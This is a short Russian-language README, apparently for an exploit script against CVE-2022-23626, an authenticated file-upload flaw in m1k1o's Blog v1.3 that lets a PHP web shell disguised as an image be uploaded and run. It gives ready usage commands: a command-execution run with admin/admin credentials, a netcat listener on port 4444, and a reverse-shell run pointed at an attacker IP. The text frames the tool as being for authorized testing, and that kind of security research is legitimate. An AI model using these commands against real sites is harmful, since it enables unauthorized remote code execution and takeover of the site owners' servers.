
Эксплойт для аутентифицированного удаленного выполнения кода для m1k1o's Blog v1.3 через непроверенную загрузку файлов, с развертыванием веб-шелла и возможностью обратной оболочки.
Аутентифицированное удаленное выполнение кода через уязвимость загрузки файлов в блоге m1k1o версии 1.3 и ниже.
Конечная точка ajax.php?action=upload_image неправильно проверяет типы загружаемых файлов, позволяя аутентифицированному пользователю загрузить PHP-веб-шелл, замаскированный под изображение. Затем атакующий может запустить исполнение, напрямую запросив загруженный файл.
requestspip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
Сначала запустите слушатель:
nc -lnvp 4444
Затем выполните:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Используйте его только на системах, на тестирование которых у вас есть явное разрешение.